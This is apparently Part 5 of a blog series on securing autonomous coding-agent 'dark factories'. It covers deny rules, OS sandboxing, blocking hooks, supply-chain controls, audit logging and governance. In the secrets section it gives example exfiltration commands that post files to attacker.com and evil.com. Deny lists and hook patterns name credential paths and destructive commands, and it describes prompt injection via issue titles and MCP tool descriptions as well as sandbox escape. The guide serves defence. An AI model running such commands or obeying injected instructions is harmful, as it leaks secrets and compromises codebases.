Can a sandboxed agent still cause damage?

A properly configured sandbox dramatically reduces the blast radius, but no single layer is perfect. That's why defense in depth matters: if the sandbox has a misconfiguration, hooks catch the dangerous operation. If hooks miss it, CI rejects the PR. The goal is never zero risk — it's layered mitigation where no single failure compromises the system.

Do I need all five security layers from day one?

No. Start with Layer 2 (permission deny rules) and Layer 3 (sandbox with allowUnsandboxedCommands: false). These two provide 80% of the protection. Add hooks in week 2, supply chain controls in week 3, and governance in week 4. The four-week rollout plan is designed for incremental adoption.

How do I handle legitimate cases where agents need secrets, like deploying to staging?

Agents should never have direct access to secrets. Use CI/CD pipeline secrets injection — the agent writes code that references environment variables, and the CI environment provides the actual values at runtime. This keeps secrets out of the agent's context entirely.

What's the performance overhead of sandboxing?

Minimal. Anthropic reports that sandboxing reduces permission prompts by 84%, which more than compensates for the small filesystem overhead. In practice, sandboxed factory runs are faster because agents spend less time waiting for permission approvals.

How does OWASP's Agentic Top 10 apply to coding agents specifically?

The risk profile escalates dramatically for coding agents because they touch actual source code. ASI01 (prompt injection) can introduce backdoors. ASI04 (supply chain) can poison dependencies. ASI05 (unexpected code execution) is literally the agent's primary function. Every OWASP risk maps to a concrete factory threat — the defense in depth model in this guide addresses all ten.

Should I use a devcontainer instead of the native sandbox?

They serve different purposes and can be combined. The native sandbox provides fine-grained, per-command enforcement. A devcontainer provides full machine isolation — ideal for untrusted code or when running agents on shared infrastructure. Trail of Bits recommends starting with native sandbox plus deny rules, and escalating to containers for higher-risk operations.

AI Dark Factory Part 5: Security & Governance

Secure an AI dark factory with harness engineering: defense in depth, OS sandboxing, secrets, supply-chain lockdown, audit trails, and the OWASP Agentic Top 10.

New to the term? Read the AI dark factory primer for what it means, who coined it, and the FANUC analogy. This page is Part 5 of the implementation playbook.

Dark Factory Series

Part 1: The Playbook|Part 2: Foundation Setup|Part 3: Spec-Driven Development|Part 4: Scaling the Factory|Part 5: Security & Governance (you are here)

An autonomous coding factory that ships 10 PRs a day is only valuable if you can trust every line it produces. Per Help Net Security's coverage, an EY survey found 64% of enterprises with over $1B revenue lost more than $1M to AI-related failures, and an AIUC-1 Consortium briefing (Stanford Trustworthy AI Research Lab and 40 security executives) found 80% of organizations reported risky agent behaviors. The OWASP Top 10 for Agentic Applications — released December 2025, peer-reviewed by 100+ security experts — ranks prompt injection, excessive autonomy, and supply chain vulnerabilities as the three most critical risks for autonomous AI systems. A dark factory without security governance isn't a factory — it's an unmonitored deployment pipeline with write access to your codebase. For the named-incidents side of this story — EchoLeak, Clinejection, the Replit production-database wipe — see How AI agents get compromised.

This guide covers the five systems you need to run a dark factory safely: defense in depth (layered security boundaries that don't depend on any single control), secrets protection (preventing credential leakage across three attack surfaces), supply chain hardening (locking down dependencies, tools, and MCP servers), audit trails (full traceability from spec to merge), and governance policies (organizational controls that scale with your factory). By the end, you'll have a hardened setup where autonomous agents operate within defined trust boundaries — and every action is logged, reviewable, and reversible.

Why Is Factory Security Different from Normal Development?

When a human developer writes code, they apply judgment at every step — they know not to commit API keys, not to run rm -rf /, and not to install a suspicious npm package. An autonomous agent doesn't have that judgment. It optimizes for the goal in its spec. If the fastest path to passing a holdout scenario involves reading a secrets file, curling an external endpoint, or adding 15 new dependencies, the agent will do it unless something stops it.

The fundamental problem: prompt-based guardrails fail because you can't secure a non-deterministic system with instructions alone. Writing "never read .env files" in your AGENTS.md is advice, not enforcement. It works 95% of the time, which means it fails once every 20 runs. At factory scale — 10+ specs per day — that's a failure every other day.

Human Developer

Reads .env → recognizes it as secrets → skips it. Sees a suspicious package → checks it manually. Makes a mistake → catches it in self-review.

Autonomous Agent

Reads .env → includes tokens in context. Sees a package suggestion → installs it. Makes a mistake → passes its own holdout scenarios because it designed them.

Scale Amplifies Risk

One agent making one mistake is a bug. Five parallel agents making mistakes is a breach. At factory velocity, incidents compound before you notice them.

Trust Must Be Structural

OS-level sandboxing, permission deny lists, and hook-based enforcement are structural. They work regardless of what the agent "thinks" it should do.

How Do You Build Defense in Depth for Autonomous Agents?

Defense in depth means that no single layer is responsible for security. If an agent bypasses your AGENTS.md instructions through prompt injection, the OS sandbox still blocks file access. If the sandbox has a misconfiguration, the hook catches the dangerous command. If the hook fails, CI/CD holdout scenarios reject the PR. Five layers, each independent:

Layer 1: AGENTS.md Rules (Advisory)

Your AGENTS.md is the outermost boundary. It sets expectations for agent behavior — which files to avoid, which patterns to follow, what operations require human approval. This layer is advisory, not enforced. An agent under prompt injection can ignore it. But for normal operations, it prevents 90%+ of accidental mistakes.

AGENTS.md security section

## Security Rules

- NEVER read, write, or reference files matching: .env*, *credentials*, *secret*, *.pem, *.key
- NEVER install packages without explicit approval in the spec
- NEVER run destructive commands: rm -rf, DROP TABLE, git push --force
- NEVER access cloud credentials: ~/.aws/**, ~/.kube/**, ~/.gcloud/**
- ALWAYS use feature branches — never commit directly to main
- ALWAYS run the project linter before committing
- If a test requires secrets, use environment variable stubs, not real values

Layer 2: Permission Deny/Allow Rules (Enforced)

Claude Code's permission system controls every tool call. By default, the agent is read-only — it must request permission before writing files, running commands, or accessing the network. You can configure explicit deny rules that cannot be overridden by the agent, even under prompt injection.

settings.json — permission deny rules

{
  "permissions": {
    "deny": [
      "Read(~/.ssh/**)",
      "Read(~/.gnupg/**)",
      "Read(~/.aws/**)",
      "Read(~/.azure/**)",
      "Read(~/.kube/**)",
      "Read(**/.env*)",
      "Read(**/*credentials*)",
      "Read(**/*secret*)",
      "Read(**/*.pem)",
      "Read(**/*.key)",
      "Edit(~/.bashrc)",
      "Edit(~/.zshrc)",
      "Edit(**/.gitconfig)"
    ]
  }
}

These rules are evaluated before any tool runs. The agent cannot access, modify, or even read these paths. Trail of Bits' open-source claude-code-config provides a battle-tested starting point for these rules, covering SSH keys, cloud credentials, package registry tokens, and shell configs.

Layer 3: OS-Level Sandbox (Kernel-Enforced)

The sandbox uses OS-level primitives — bubblewrap on Linux and Seatbelt on macOS — to enforce filesystem and network isolation at the kernel level. This isn't application-level filtering that an agent could work around. Every subprocess, script, and child process spawned by the agent inherits the same restrictions. Internal testing shows sandboxing reduces permission prompts by 84% while maintaining stronger security than prompt-based approval.

settings.json — sandbox configuration

{
  "sandbox": {
    "enabled": true,
    "autoAllow": true,
    "allowUnsandboxedCommands": false,
    "filesystem": {
      "allowWrite": ["//tmp/build"],
      "denyRead": ["~/.ssh", "~/.gnupg", "~/.aws"],
      "denyWrite": ["~/.bashrc", "~/.zshrc"]
    },
    "network": {
      "allowedDomains": [
        "registry.npmjs.org",
        "github.com",
        "api.github.com"
      ]
    }
  }
}

Critical: set allowUnsandboxedCommands: false in factory mode. This disables the escape hatch that lets the agent retry failed commands outside the sandbox. Without this, a compromised agent can bypass every sandbox restriction by simply claiming the sandboxed command "failed."

Warning: Effective sandboxing requires both filesystem and network isolation. Without network isolation, a compromised agent could exfiltrate SSH keys via curl. Without filesystem isolation, it could backdoor ~/.bashrc to gain network access on the next shell launch. Both must be active simultaneously.

Layer 4: Hooks (Programmable Enforcement)

Hooks are shell commands that fire at specific points in the agent's lifecycle — before a tool runs, after it completes, or when a notification is sent. They can inspect the operation, block it, or log it. Unlike AGENTS.md rules, hooks execute as real programs with real exit codes: exit 0 to allow, exit non-zero to block.

settings.json — security hooks

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "echo '$TOOL_INPUT' | grep -qiE 'rm\s+-rf|DROP\s+TABLE|--force|--no-verify' && echo 'BLOCKED: destructive command' >&2 && exit 1 || exit 0"
          }
        ]
      },
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "echo '$TOOL_INPUT' | grep -qiE 'curl.*(-d|--data)|wget.*--post' && echo 'BLOCKED: outbound data transfer' >&2 && exit 1 || exit 0"
          }
        ]
      }
    ],
    "PostToolUse": [
      {
        "matcher": "Edit",
        "hooks": [
          {
            "type": "command",
            "command": "echo '$TOOL_INPUT' | grep -qiE '(api[_-]?key|secret|password|token)\\s*[:=]\\s*[\"''''][^\"'''']' && echo 'BLOCKED: possible hardcoded secret' >&2 && exit 1 || exit 0"
          }
        ]
      }
    ]
  }
}

Hooks are your most flexible enforcement layer. Use them to block destructive commands, prevent outbound data transfers, scan edits for hardcoded secrets, and log every tool invocation to an audit file. They run as real shell processes, so you can integrate with any external tool — secret scanners, policy engines, SIEM systems.

Layer 5: CI/CD Pipeline (Final Gate)

The agent's PR is its output. Your CI/CD pipeline is the last line of defense. Every PR should pass through:

Secret Scanning

Tools like gitleaks, truffleHog, or GitHub secret scanning run on every commit. If an agent accidentally hardcodes a token, CI catches it before merge.

Holdout Scenarios

From Part 3 — tests the agent didn't write, validating the implementation against independently defined acceptance criteria.

Dependency Audit

npm audit, socket.dev, or Snyk scan every new dependency for known vulnerabilities, typosquatting, and excessive permissions.

Holdout scenarios are introduced in detail in Part 3: Spec-Driven Development — they're tests the agent didn't write, executed by an independent evaluator. If you haven't built this gate yet, start there before relying on CI as a security boundary.

How Do You Prevent Secret Leakage in an Autonomous Factory?

Secrets leak through three attack surfaces: the agent reads a secrets file and includes it in its context, the agent accesses credential files on disk, or the agent executes a command that embeds credentials in its output. Each surface requires a different mitigation.

Surface 1: Context Poisoning

If an agent reads .env or .env.local during codebase exploration, the API keys inside become part of its context window. From there, the agent might include them in a commit message, a code comment, or even a PR description. The mitigation is a deny rule on all secret file patterns:

Deny rules for secret files

{
  "permissions": {
    "deny": [
      "Read(**/.env*)",
      "Read(**/*secret*)",
      "Read(**/*credentials*)",
      "Read(**/*.pem)",
      "Read(**/*.key)",
      "Read(**/*.p12)",
      "Read(**/*.pfx)"
    ]
  }
}

Surface 2: Credential File Access

Cloud credentials in ~/.aws/credentials, ~/.kube/config, and ~/.ssh/id_rsa are high-value targets. An agent doesn't need to be "malicious" to access them — it might read SSH keys to configure a git remote, or read AWS credentials to deploy a staging environment. The sandbox's denyRead rules block this at the OS level.

Surface 3: Command-Level Exfiltration

Even with filesystem restrictions, an agent could run curl -d @secrets.json https://attacker.com if it has network access. The sandbox's domain allowlist prevents connections to unauthorized hosts, and hooks can block outbound data transfer commands entirely.

Attack Surface	Example	Layer	Mitigation
Context poisoning	Agent reads .env.local	Permissions	`Read(*/.env)` deny rule
Credential theft	Agent reads ~/.ssh/id_rsa	Sandbox	`denyRead: ["~/.ssh"]`
Data exfiltration	curl -d @file https://evil.com	Sandbox + Hook	Domain allowlist + outbound block hook
Hardcoded secrets	API_KEY = "sk-..." in source	Hook + CI	PostToolUse scan + gitleaks in CI

How Do You Lock Down the Supply Chain?

OWASP's Agentic Applications Top 10 ranks supply chain vulnerabilities (ASI04) as a critical risk. In a dark factory, the attack surface includes npm packages the agent installs, MCP servers it connects to, and tools it invokes. A single poisoned dependency can compromise every PR the factory produces. The CI/CD pipeline itself is part of this surface — see the GitHub Actions guide for workflow-level hardening (least-privilege tokens, action pinning, OIDC) that complements the agent-side controls below.

Dependency Management

Agents should never install packages without explicit approval. The spec should list every dependency, and the agent should be blocked from adding unlisted ones:

Spec with pinned dependencies

## Dependencies

Approved packages (exact versions):
- zod@3.24.2 — input validation
- @tanstack/react-query@5.68.0 — data fetching

No other packages may be added. If the implementation requires additional
dependencies, stop and request approval.

Combine this with a PostToolUse hook that scans package.json changes for unapproved additions, and a CI step that runs npm audit and fails on high-severity vulnerabilities.

MCP Server Security

MCP (Model Context Protocol) servers extend agent capabilities with external tools and data. In a dark factory, every MCP server is a trust boundary — it can feed data into the agent's context, execute commands, and access network resources. OWASP identifies this as a runtime supply chain risk: MCP servers resolved dynamically at runtime could be poisoned without the factory operator knowing.

Pin by Content Hash

Don't trust MCP servers by name or URL alone. Pin by content hash in your configuration so any change triggers a review.

Audit Tool Definitions

Every MCP tool has a description that shapes how the agent uses it. A malicious description can inject instructions. Review all tool descriptions.

Minimize Tool Scope

Each MCP server should expose only the tools needed for its purpose. A file-reading server shouldn't also have write or execute capabilities.

Network Isolation

MCP servers run outside the sandbox by default. Use the sandbox-runtime npm package to sandbox MCP server processes individually.

Prompt Injection Defense

Prompt injection is ranked #1 (ASI01) in OWASP's Agentic Top 10. In a factory context, the attack isn't just about getting the agent to say something wrong — it's about getting it to execute something dangerous. A poisoned issue title, PR description, or imported file can redirect the agent's goal entirely.

The "Clinejection" attack demonstrated this in production: a malicious GitHub issue title injected instructions into a CI/CD pipeline's AI agent, turning it into a supply chain attack vector. The agent had Bash, Write, and Edit permissions — and the injected prompt used all three.

Defense	Mechanism	Protects Against
Input sanitization	Strip control characters from untrusted data before including in agent context	Direct injection via issue titles, PR bodies
Tool minimization	Scope `--allowedTools` to minimum required for the task	Blast radius of successful injection
Sandbox + deny rules	OS-level enforcement regardless of prompt state	All exfiltration and destructive operations
Output validation	Treat agent output as untrusted; validate in CI before merge	Injected backdoors, vulnerable code patterns

How Do You Build an Audit Trail for Autonomous Operations?

Only 21% of executives have complete visibility into agent permissions and data access. In a dark factory, every action the agent takes should be traceable: which spec triggered it, which model processed it, what tools were invoked, what files were changed, and whether it was auto-merged or human-reviewed. Without this, you can't diagnose failures, prove compliance, or improve your factory.

The Four Audit Dimensions

Spec Traceability

Every PR links to its source spec. Every spec links to its business requirement. You can trace any production change back to the human decision that authorized it.

Tool Call Logging

Every tool invocation — Read, Edit, Bash, WebFetch — is logged with its input, output, and timestamp. Hooks can write these to a structured log file or external SIEM.

Permission Decisions

Every allow/deny decision is recorded: what the agent tried to do, which rule matched, and whether it was approved. This reveals patterns of overreach.

Cost Attribution

Token spend is tagged to specific specs, agents, and models. From Part 4's cost control: you can answer "what did we spend to ship this feature?"

Implementing Structured Logging

Use PostToolUse hooks to create a structured audit log. Each entry captures the tool, input hash, timestamp, and result — enough to reconstruct exactly what the agent did and why.

audit-log.sh — PostToolUse hook

#!/bin/bash
# Append structured audit entry for every tool call
TIMESTAMP=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
TOOL_NAME="$CLAUDE_TOOL_NAME"
INPUT_HASH=$(echo "$TOOL_INPUT" | sha256sum | cut -d' ' -f1)

echo "{
  \"timestamp\": \"$TIMESTAMP\",
  \"tool\": \"$TOOL_NAME\",
  \"input_hash\": \"$INPUT_HASH\",
  \"session_id\": \"$CLAUDE_SESSION_ID\",
  \"spec\": \"$CURRENT_SPEC\"
}" >> .factory/audit.jsonl

For production factories, pipe this to a centralized logging system — a SIEM, ELK stack, or even a simple S3 bucket with lifecycle policies. The key is that the log exists outside the agent's control: the agent can't modify or delete its own audit trail.

Git as the Ultimate Audit Trail

Every dark factory PR is already an audit record. The commit history shows exactly what changed, the PR description links to the spec, CI logs show which checks passed, and the merge decision (auto or human) is recorded. Enhance this by enforcing:

Signed commits — use a factory-specific GPG key so you can distinguish agent commits from human commits
Conventional commit messages — structured format that links each commit to a spec ID: feat(SPEC-042): add webhook retry logic
Branch protection rules — require CI checks, holdout scenarios, and optional human review before merge
PR templates — auto-include spec link, model used, token cost, and security scan results in every PR description

What Governance Policies Should a Factory Have?

Governance is the organizational layer above technical controls. It defines who can authorize factory operations, what the factory is allowed to do, and how decisions are escalated when something goes wrong. Without governance, you have a tool. With governance, you have a process.

The Governance Matrix

Operation	Risk Level	Approval Required	Auto-Merge Eligible
Internal code changes (no new deps)	Low	Spec only	Yes — if holdouts pass
Adding new dependencies	Medium	Spec + dependency listed	Yes — if audit clean
Database schema changes	Medium	Spec + migration review	No — human review required
Auth / permissions code	High	Spec + security review	No — human review required
Infrastructure changes	High	Spec + ops review + plan output	No — human review required
Secret rotation / credential changes	Critical	Out of scope for agents	No — never agent-driven

Agent Identity and Attribution

Every agent should have a distinct identity. This isn't just philosophical — it's practical for audit trails, cost attribution, and access control. In 2026, OWASP and governance frameworks agree: without distinct agent identity, access controls become guesswork and audit trails become fragmented.

Agent identity configuration

# Each factory agent gets:
agent:
  id: factory-agent-01
  git_user: "Factory Agent 01"
  git_email: "factory-01@yourcompany.com"
  gpg_key: "ABCD1234..."          # Unique signing key
  max_daily_spend: 50              # Budget cap in USD
  allowed_repos:
    - your-org/main-app
    - your-org/shared-libs
  restricted_paths:
    - "infra/**"
    - "deploy/**"
    - ".github/workflows/**"

With distinct identities, you can answer: "Which agent made this change? What was its authorization scope? Did it exceed its budget?" Every git blame, every PR author, and every cost metric maps to a specific agent with specific permissions.

Escalation Policies

Define clear escalation paths for when automated controls trigger:

Circuit Breaker Fires

From Part 4: 3+ rollbacks in 24h, holdout pass rate below 85%, or spend exceeding 2x average. Action: pause factory, alert on-call, investigate root cause.

Security Violation Detected

Agent attempts to access denied paths, exfiltrate data, or install unapproved packages. Action: terminate session immediately, log full context, alert security team.

Governance Conflict

Agent produces code that modifies auth logic, touches infrastructure, or affects compliance scope. Action: block auto-merge, route to designated human reviewer.

What Does a Fully Hardened Factory Configuration Look Like?

Here's a complete settings.json that implements all five security layers for a production dark factory. This configuration is conservative — start here and relax rules only when you have evidence that specific restrictions are blocking legitimate work.

settings.json — production dark factory

{
  "permissions": {
    "deny": [
      "Read(~/.ssh/**)",
      "Read(~/.gnupg/**)",
      "Read(~/.aws/**)",
      "Read(~/.azure/**)",
      "Read(~/.kube/**)",
      "Read(**/.env*)",
      "Read(**/*credentials*)",
      "Read(**/*secret*)",
      "Read(**/*.pem)",
      "Read(**/*.key)",
      "Edit(~/.bashrc)",
      "Edit(~/.zshrc)",
      "Edit(**/.gitconfig)",
      "Edit(.github/workflows/**)"
    ]
  },
  "sandbox": {
    "enabled": true,
    "autoAllow": true,
    "allowUnsandboxedCommands": false,
    "filesystem": {
      "denyRead": ["~/.ssh", "~/.gnupg", "~/.aws", "~/.azure", "~/.kube"],
      "denyWrite": ["~/.bashrc", "~/.zshrc", "~/.profile"]
    },
    "network": {
      "allowedDomains": [
        "registry.npmjs.org",
        "github.com",
        "api.github.com"
      ]
    }
  },
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "echo '$TOOL_INPUT' | grep -qiE 'rm\\s+-rf|DROP\\s+TABLE|--force|--no-verify|push.*main' && exit 1 || exit 0"
          }
        ]
      }
    ],
    "PostToolUse": [
      {
        "matcher": "Edit",
        "hooks": [
          {
            "type": "command",
            "command": "echo '$TOOL_INPUT' | grep -qiE '(api[_-]?key|secret|password|token)\\s*[:=]\\s*[\"''''][A-Za-z0-9]' && exit 1 || exit 0"
          }
        ]
      }
    ]
  }
}

Your Four-Week Security Rollout

Week 1: Permissions + Sandbox

Enable the sandbox with autoAllow. Add deny rules for all secret file patterns. Set allowUnsandboxedCommands to false. Run your existing factory and verify nothing breaks.

Week 2: Hooks + Logging

Add PreToolUse hooks to block destructive commands. Add PostToolUse hooks for secret scanning and audit logging. Ship structured logs to your existing monitoring stack.

Week 3: Supply Chain + CI

Add dependency audit to CI. Require specs to list all new dependencies. Review MCP server configurations and pin by content hash. Add gitleaks or truffleHog to the PR pipeline.

Week 4: Governance + Identity

Assign distinct identities to each factory agent. Implement the governance matrix — tag PRs by risk level. Set up escalation paths. Run a tabletop exercise: "what happens if Agent 02 is prompt-injected?"

What Are the Most Common Security Pitfalls?

Trusting AGENTS.md Alone

AGENTS.md is advice. It works when the agent cooperates and fails under prompt injection. Every critical rule in AGENTS.md should have an enforced counterpart in permissions, sandbox, or hooks.

Leaving the Sandbox Escape Hatch Open

The default allowUnsandboxedCommands: true setting lets agents retry commands outside the sandbox. In a factory, this defeats the purpose of sandboxing entirely. Set it to false.

Overly Broad Network Access

Allowing github.com in the domain allowlist also allows data exfiltration via GitHub API calls. Scope to specific subdomains where possible, and use hooks to monitor outbound data.

No Agent Identity Separation

When all agents share the same git credentials and API keys, you can't attribute costs, trace incidents, or enforce per-agent budgets. Distinct identities cost nothing but provide full auditability.

Security as a One-Time Setup

The threat landscape evolves. Schedule monthly reviews of your deny rules, domain allowlists, and hook configurations. Run periodic tabletop exercises where you simulate prompt injection, secret leakage, and supply chain attacks.

Ignoring Shadow AI

86% of organizations report zero visibility into AI data flows. If developers run personal AI assistants alongside the factory, those ungovernored tools become the weakest link. Establish an AI usage policy.

References

Sandboxing — Claude Code Docs — filesystem isolation, network isolation, OS-level enforcement, and configuration reference
Making Claude Code More Secure and Autonomous — Anthropic Engineering — the sandboxing architecture, 84% prompt reduction finding, and defense-in-depth rationale
AI Agent Security Cheat Sheet — OWASP — comprehensive threat model with 12 risk categories and mitigation strategies for autonomous agents
OWASP Top 10 for Agentic Applications (2026) — the definitive ranking of security risks for autonomous AI systems, peer-reviewed by 100+ experts
Trail of Bits Claude Code Config — GitHub — opinionated security defaults, permission hardening, hooks, and sandboxing workflows
LlamaFirewall — Meta AI Research — open-source guardrail system with PromptGuard 2, Agent Alignment Checks, and CodeShield
Clinejection: AI Agent Supply Chain Attack via Prompt Injection — Snyk — real-world case study of prompt injection turning a CI/CD AI agent into a supply chain attack vector
Enterprise AI Agent Security 2026 — Help Net Security — 64% of $1B+ enterprises lost over $1M to AI failures; 80% report risky agent behaviors

Part 4: Scaling the Factory

Series Start

Part 1: The Implementation Playbook